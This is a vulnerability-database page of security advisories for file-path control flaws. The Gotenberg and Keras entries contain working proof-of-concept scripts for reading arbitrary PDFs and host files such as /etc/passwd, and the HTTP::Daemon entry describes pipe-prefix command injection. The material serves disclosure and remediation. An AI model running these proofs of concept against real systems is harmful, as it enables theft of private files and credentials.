Common Weakness Enumeration

CWE-73

Allowed

External Control of File Name or Path

Abstraction: Base · Status: Draft

The product allows user input to control or influence paths or file names that are used in filesystem operations.

915 vulnerabilities reference this CWE, most recent first.

GHSA-3CH5-8236-6HMM

Vulnerability from github – Published: 2024-09-25 03:30 – Updated: 2026-06-02 09:36
VLAI
Details

External Control of File Name or Path, : Incorrect Permission Assignment for Critical Resource vulnerability in Olgu Computer Systems e-Belediye allows Manipulating Web Input to File System Calls.This issue affects e-Belediye: before 2.0.642.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9142"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-25T01:15:49Z",
    "severity": "CRITICAL"
  },
  "details": "External Control of File Name or Path, : Incorrect Permission Assignment for Critical Resource vulnerability in Olgu Computer Systems e-Belediye allows Manipulating Web Input to File System Calls.This issue affects e-Belediye: before 2.0.642.",
  "id": "GHSA-3ch5-8236-6hmm",
  "modified": "2026-06-02T09:36:12Z",
  "published": "2024-09-25T03:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9142"
    },
    {
      "type": "WEB",
      "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-24-1527"
    },
    {
      "type": "WEB",
      "url": "https://www.usom.gov.tr/bildirim/tr-24-1527"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-3CV5-Q585-H563

Vulnerability from github – Published: 2026-05-07 00:59 – Updated: 2026-05-14 20:52
VLAI
Summary
Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes
Details

Summary

Six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown) accept stampSource=pdf + stampExpression=/path and watermarkSource=pdf + watermarkExpression=/path from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.

Details

The dedicated stamp route at pkg/modules/pdfengines/routes.go:1322-1332 rejects requests missing the stamp file:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(errors.New("no stamp file provided"), ...)
    }
    stamp.Expression = stampFile
}

The merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):

// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);
// pkg/modules/libreoffice/routes.go:307-311;
// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597
if (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) && stampFile != "" {
    stamp.Expression = stampFile
}
if (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) && watermarkFile != "" {
    watermark.Expression = watermarkFile
}

When stampFile == "" (no file attached to the stamp form field), the guard short-circuits and stamp.Expression keeps the raw user-supplied stampExpression form string. The same pattern applies to watermarkFile/watermarkExpression.

pkg/modules/pdfcpu/pdfcpu.go:635 forwards the expression straight to the pdfcpu CLI:

args := []string{"stamp", "add", "-mode", "pdf", "--", stamp.Expression, onDesc, inputPath, outputPath}
cmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)

pdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.

Proof of Concept

Reproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared /tmp filesystem:

docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8
docker exec gotenberg-poc sh -c 'cat > /tmp/victim_doc.pdf' < victim.pdf

Where victim.pdf contains extractable text such as BOB-CONFIDENTIAL-CONTRACT-2026-04-20.

Alice attacks without auth:

import requests, io, subprocess
T = "http://localhost:3000"

minimal = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
           b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
           b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
           b"xref\n0 4\n0000000000 65535 f \n0000000009 00000 n \n"
           b"0000000058 00000 n \n0000000115 00000 n \n"
           b"trailer\n<< /Size 4 /Root 1 0 R >>\nstartxref\n180\n%%EOF\n")

r = requests.post(
    f"{T}/forms/pdfengines/merge",
    files={"file1": ("a.pdf", io.BytesIO(minimal), "application/pdf"),
           "file2": ("b.pdf", io.BytesIO(minimal), "application/pdf")},
    data={"stampSource": "pdf", "stampExpression": "/tmp/victim_doc.pdf"},
    timeout=30,
)
print(f"HTTP {r.status_code} bytes={len(r.content)}")
open("/tmp/out.pdf", "wb").write(r.content)
print(subprocess.run(["pdftotext", "/tmp/out.pdf", "-"],
                     capture_output=True, text=True).stdout)

Observed output against gotenberg 8.31.0:

HTTP 200 bytes=1852
BOB-CONFIDENTIAL-CONTRACT-2026-04-20
...

Non-PDF targets via stampSource=pdf (for example /etc/hostname) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. stampSource=image with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with stampSource replaced by watermarkSource and stampExpression by watermarkExpression.

Impact

Any anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to /tmp/<gotenberg-work-uuid>/<request-uuid>/*.pdf (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.

Recommended Fix

Apply the dedicated stamp route's guard to all six stamp call sites and all six watermark call sites:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(
            errors.New("no stamp file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a stamp file is required for image or pdf source"),
        )
    }
    stamp.Expression = stampFile
}
if watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {
    if watermarkFile == "" {
        return api.WrapError(
            errors.New("no watermark file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a watermark file is required for image or pdf source"),
        )
    }
    watermark.Expression = watermarkFile
}

Call sites: pkg/modules/pdfengines/routes.go:679-683 (merge), :803-807 (split), pkg/modules/libreoffice/routes.go:307-311, pkg/modules/chromium/routes.go:433-438 (url), :508-513 (html), :592-597 (markdown), plus each route's watermark counterpart.


Found by aisafe.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "8.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42593"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T00:59:50Z",
    "nvd_published_at": "2026-05-14T16:16:22Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nSix conversion routes (`pdfengines/merge`, `pdfengines/split`, `libreoffice/convert`, `chromium/convert/url`, `chromium/convert/html`, `chromium/convert/markdown`) accept `stampSource=pdf` + `stampExpression=/path` and `watermarkSource=pdf` + `watermarkExpression=/path` from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.\n\n## Details\n\nThe dedicated stamp route at `pkg/modules/pdfengines/routes.go:1322-1332` rejects requests missing the stamp file:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(errors.New(\"no stamp file provided\"), ...)\n    }\n    stamp.Expression = stampFile\n}\n```\n\nThe merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):\n\n```go\n// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);\n// pkg/modules/libreoffice/routes.go:307-311;\n// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597\nif (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) \u0026\u0026 stampFile != \"\" {\n    stamp.Expression = stampFile\n}\nif (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) \u0026\u0026 watermarkFile != \"\" {\n    watermark.Expression = watermarkFile\n}\n```\n\nWhen `stampFile == \"\"` (no file attached to the `stamp` form field), the guard short-circuits and `stamp.Expression` keeps the raw user-supplied `stampExpression` form string. The same pattern applies to `watermarkFile`/`watermarkExpression`.\n\n`pkg/modules/pdfcpu/pdfcpu.go:635` forwards the expression straight to the pdfcpu CLI:\n\n```go\nargs := []string{\"stamp\", \"add\", \"-mode\", \"pdf\", \"--\", stamp.Expression, onDesc, inputPath, outputPath}\ncmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)\n```\n\npdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.\n\n## Proof of Concept\n\nReproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared `/tmp` filesystem:\n\n```bash\ndocker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8\ndocker exec gotenberg-poc sh -c \u0027cat \u003e /tmp/victim_doc.pdf\u0027 \u003c victim.pdf\n```\n\nWhere `victim.pdf` contains extractable text such as `BOB-CONFIDENTIAL-CONTRACT-2026-04-20`.\n\nAlice attacks without auth:\n\n```python\nimport requests, io, subprocess\nT = \"http://localhost:3000\"\n\nminimal = (b\"%PDF-1.4\\n1 0 obj\\n\u003c\u003c /Type /Catalog /Pages 2 0 R \u003e\u003e\\nendobj\\n\"\n           b\"2 0 obj\\n\u003c\u003c /Type /Pages /Kids [3 0 R] /Count 1 \u003e\u003e\\nendobj\\n\"\n           b\"3 0 obj\\n\u003c\u003c /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] \u003e\u003e\\nendobj\\n\"\n           b\"xref\\n0 4\\n0000000000 65535 f \\n0000000009 00000 n \\n\"\n           b\"0000000058 00000 n \\n0000000115 00000 n \\n\"\n           b\"trailer\\n\u003c\u003c /Size 4 /Root 1 0 R \u003e\u003e\\nstartxref\\n180\\n%%EOF\\n\")\n\nr = requests.post(\n    f\"{T}/forms/pdfengines/merge\",\n    files={\"file1\": (\"a.pdf\", io.BytesIO(minimal), \"application/pdf\"),\n           \"file2\": (\"b.pdf\", io.BytesIO(minimal), \"application/pdf\")},\n    data={\"stampSource\": \"pdf\", \"stampExpression\": \"/tmp/victim_doc.pdf\"},\n    timeout=30,\n)\nprint(f\"HTTP {r.status_code} bytes={len(r.content)}\")\nopen(\"/tmp/out.pdf\", \"wb\").write(r.content)\nprint(subprocess.run([\"pdftotext\", \"/tmp/out.pdf\", \"-\"],\n                     capture_output=True, text=True).stdout)\n```\n\nObserved output against gotenberg 8.31.0:\n\n```\nHTTP 200 bytes=1852\nBOB-CONFIDENTIAL-CONTRACT-2026-04-20\n...\n```\n\nNon-PDF targets via `stampSource=pdf` (for example `/etc/hostname`) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. `stampSource=image` with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with `stampSource` replaced by `watermarkSource` and `stampExpression` by `watermarkExpression`.\n\n## Impact\n\nAny anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to `/tmp/\u003cgotenberg-work-uuid\u003e/\u003crequest-uuid\u003e/*.pdf` (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.\n\n## Recommended Fix\n\nApply the dedicated stamp route\u0027s guard to all six stamp call sites and all six watermark call sites:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no stamp file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a stamp file is required for image or pdf source\"),\n        )\n    }\n    stamp.Expression = stampFile\n}\nif watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {\n    if watermarkFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no watermark file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a watermark file is required for image or pdf source\"),\n        )\n    }\n    watermark.Expression = watermarkFile\n}\n```\n\nCall sites: `pkg/modules/pdfengines/routes.go:679-683` (merge), `:803-807` (split), `pkg/modules/libreoffice/routes.go:307-311`, `pkg/modules/chromium/routes.go:433-438` (url), `:508-513` (html), `:592-597` (markdown), plus each route\u0027s watermark counterpart.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-3cv5-q585-h563",
  "modified": "2026-05-14T20:52:32Z",
  "published": "2026-05-07T00:59:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-3cv5-q585-h563"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42593"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes"
}

GHSA-3G9H-GC4R-R2PP

Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-19 18:31
VLAI
Details

Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-26361"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-19T09:16:25Z",
    "severity": "MODERATE"
  },
  "details": "Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.",
  "id": "GHSA-3g9h-gc4r-r2pp",
  "modified": "2026-02-19T18:31:53Z",
  "published": "2026-02-19T18:31:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26361"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000429268/dsa-2026-102-dell-unisphere-for-powermax-and-powermax-eem-security-update-for-multiple-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3H64-FX5V-2F3Q

Vulnerability from github – Published: 2025-12-12 06:31 – Updated: 2026-04-08 18:34
VLAI
Details

The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-13320"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-12T04:15:41Z",
    "severity": "MODERATE"
  },
  "details": "The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP\u0027s filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the \u0027current_user_avatar\u0027 parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled.",
  "id": "GHSA-3h64-fx5v-2f3q",
  "modified": "2026-04-08T18:34:00Z",
  "published": "2025-12-12T06:31:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13320"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3420956/wp-user-manager/trunk/includes/forms/trait-wpum-account.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3HC6-3P33-WQ57

Vulnerability from github – Published: 2026-05-27 06:31 – Updated: 2026-07-07 12:31
VLAI
Details

HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file().

send_file() opens its string argument with Perl's 2-arg open(). The 2-arg form interprets magic prefixes: '| cmd' and 'cmd |' open a pipe to a subprocess, '> path' and '>> path' open the path for write or append.

Untrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form ('cmd |') also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8450"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73",
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-27T05:16:23Z",
    "severity": "CRITICAL"
  },
  "details": "HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file().\n\nsend_file() opens its string argument with Perl\u0027s 2-arg open(). The 2-arg form interprets magic prefixes: \u0027| cmd\u0027 and \u0027cmd |\u0027 open a pipe to a subprocess, \u0027\u003e path\u0027 and \u0027\u003e\u003e path\u0027 open the path for write or append.\n\nUntrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form (\u0027cmd |\u0027) also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths.",
  "id": "GHSA-3hc6-3p33-wq57",
  "modified": "2026-07-07T12:31:29Z",
  "published": "2026-05-27T06:31:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8450"
    },
    {
      "type": "WEB",
      "url": "https://github.com/libwww-perl/HTTP-Daemon/pull/89"
    },
    {
      "type": "WEB",
      "url": "https://github.com/libwww-perl/HTTP-Daemon/commit/945d35141d94490f749640bd4390acd6a2193995.patch"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36187"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36188"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36189"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-8450"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481773"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2026/06/msg00028.html"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/OALDERS/HTTP-Daemon-6.17/changes"
    },
    {
      "type": "WEB",
      "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8450.json"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/05/27/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3HHQ-XM5H-WCVH

Vulnerability from github – Published: 2022-09-07 00:01 – Updated: 2025-03-21 18:31
VLAI
Details

The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion in versions up to, and including 3.2.50. This is due to insufficient file type and path validation on the deleteFiles() function found in the ~/Admin/Menu/Packages.php file that triggers upon download post deletion. This makes it possible for contributor level users and above to supply an arbitrary file path via the 'file[files]' parameter when creating a download post and once the user deletes the post the supplied arbitrary file will be deleted. This can be used by attackers to delete the /wp-config.php file which will reset the installation and make it possible for an attacker to achieve remote code execution on the server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-2431"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-610",
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-06T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion in versions up to, and including 3.2.50. This is due to insufficient file type and path validation on the deleteFiles() function found in the ~/Admin/Menu/Packages.php file that triggers upon download post deletion. This makes it possible for contributor level users and above to supply an arbitrary file path via the \u0027file[files]\u0027 parameter when creating a download post and once the user deletes the post the supplied arbitrary file will be deleted. This can be used by attackers to delete the /wp-config.php file which will reset the installation and make it possible for an attacker to achieve remote code execution on the server.",
  "id": "GHSA-3hhq-xm5h-wcvh",
  "modified": "2025-03-21T18:31:19Z",
  "published": "2022-09-07T00:01:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2431"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/167920/wpdownloadmanager3250-filedelete.txt"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=2762092%40download-manager\u0026new=2762092%40download-manager\u0026sfp_email=\u0026sfph_mail="
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/blog/2022/08/high-severity-vulnerability-patched-in-download-manager-plugin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3M4Q-JMJ6-R34Q

Vulnerability from github – Published: 2026-02-18 22:41 – Updated: 2026-02-18 22:41
VLAI
Summary
Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading
Details

Summary

TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).

Impact

  • Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
  • What leaks: Contents of any readable file on the host (e.g., /etc/hosts, /etc/passwd, /etc/hostname).
  • Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
  • Prerequisites: Victim executes model.load_weights() or tf.keras.models.load_model() on an attacker-supplied HDF5 weights file or .keras archive.
  • Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.

Attacker Scenario

  1. Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
  2. Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., /home/<user>/.ssh/id_rsa, /etc/shadow if readable, configuration files containing API keys, etc.).
  3. Execution: The victim calls model.load_weights() (or tf.keras.models.load_model() for .keras archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
  4. Exfiltration vectors:
  5. Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
  6. Re-saving the model (weights or .keras archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
  7. If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.

Additional Preconditions

  • The target file must exist and be readable by the process running TensorFlow/Keras.
  • Safe mode (load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.
  • Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to /etc/hostname) can reduce impact, but common defaults expose a broad set of host files.

Environment Used for Verification (2025‑10‑19)

  • OS: Debian-based container running Python 3.11.
  • Packages (installed via python -m pip install -U ...):
  • tensorflow==2.20.0
  • keras==3.11.3
  • h5py==3.15.1
  • numpy==2.3.4
  • Tooling: strace (for syscall tracing), pip upgraded to latest before installs.
  • Debug flags: PYTHONFAULTHANDLER=1, TF_CPP_MIN_LOG_LEVEL=0 during instrumentation to capture verbose logs if needed.

Reproduction Instructions (Weights-Only PoC)

  1. Ensure the environment above (or equivalent) is prepared.
  2. Save the following script as weights_external_demo.py:
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py

def choose_host_file() -> Path:
    candidates = [
        os.environ.get("KFLI_PATH"),
        "/etc/machine-id",
        "/etc/hostname",
        "/proc/sys/kernel/hostname",
        "/etc/passwd",
    ]
    for candidate in candidates:
        if not candidate:
            continue
        path = Path(candidate)
        if path.exists() and path.is_file():
            return path
    raise FileNotFoundError("set KFLI_PATH to a readable file")

def build_model(units: int) -> tf.keras.Model:
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(1,), name="input"),
        tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
    ])
    model(tf.zeros((1, 1)))  # build weights
    return model

def find_bias_dataset(h5file: h5py.File) -> str:
    matches: list[str] = []
    def visit(name: str, obj) -> None:
        if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
            matches.append(name)
    h5file.visititems(visit)
    if not matches:
        raise RuntimeError("bias dataset not found")
    return matches[0]

def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
    with h5py.File(path, "r+") as h5file:
        bias_path = find_bias_dataset(h5file)
        parent = h5file[str(Path(bias_path).parent)]
        dset_name = Path(bias_path).name
        del parent[dset_name]
        max_bytes = 128
        size = host_file.stat().st_size
        nbytes = min(size, max_bytes)
        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing
        units = max(1, nbytes // 4)
        parent.create_dataset(
            dset_name,
            shape=(units,),
            dtype="float32",
            external=[(host_file.as_posix(), 0, nbytes)],
        )
        return units, nbytes

def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
    raw = np.ascontiguousarray(arr).view(np.uint8)
    ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
    hex_preview = raw[:64].tobytes().hex()
    return ascii_preview, hex_preview

def main() -> None:
    host_file = choose_host_file()
    model = build_model(units=32)

    weights_path = Path("weights_demo.h5")
    model.save_weights(weights_path.as_posix())

    units, nbytes = rewrite_bias_external(weights_path, host_file)
    print("secret_text_source", host_file)
    print("units", units, "bytes_mapped", nbytes)

    model.load_weights(weights_path.as_posix())
    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
    ascii_preview, hex_preview = floats_to_ascii(output)
